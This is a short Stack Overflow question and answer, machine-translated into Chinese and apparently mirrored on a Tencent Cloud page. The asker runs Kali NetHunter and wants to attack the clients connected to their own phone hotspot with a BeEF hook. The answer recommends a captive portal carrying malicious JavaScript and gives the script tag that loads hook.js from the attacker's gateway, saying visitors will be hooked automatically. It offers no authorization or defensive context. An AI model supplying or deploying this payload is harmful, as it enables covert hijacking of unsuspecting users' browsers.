在没有MITM攻击的情况下使用牛肉js注射?(在热点模式下)
在没有MITM攻击的情况下使用牛肉js注射?(在热点模式下)
提问于 2017-07-15 17:35:30
我正在我的android上运行Kali Nethunter,我能够在它上很好地运行牛肉-xss。js钩子在http://gateway:3000/hooks.js上,但我不能使用mitmf来注入,因为我正在运行我自己的android手机热点。有没有什么程序可以让我对连接到我的热点的客户端进行攻击?
回答 1
Stack Overflow用户
发布于 2017-10-09 22:18:54
如果您控制了热点,请在HTML代码中设置一个包含恶意JS的强制Portal。
示例:
<script src=”http://gateway:3000/hook.js” type=”text/javascript”></script>
这样,它们就必须自动与您挂钩;)
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://stackoverflow.com/questions/45116703
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号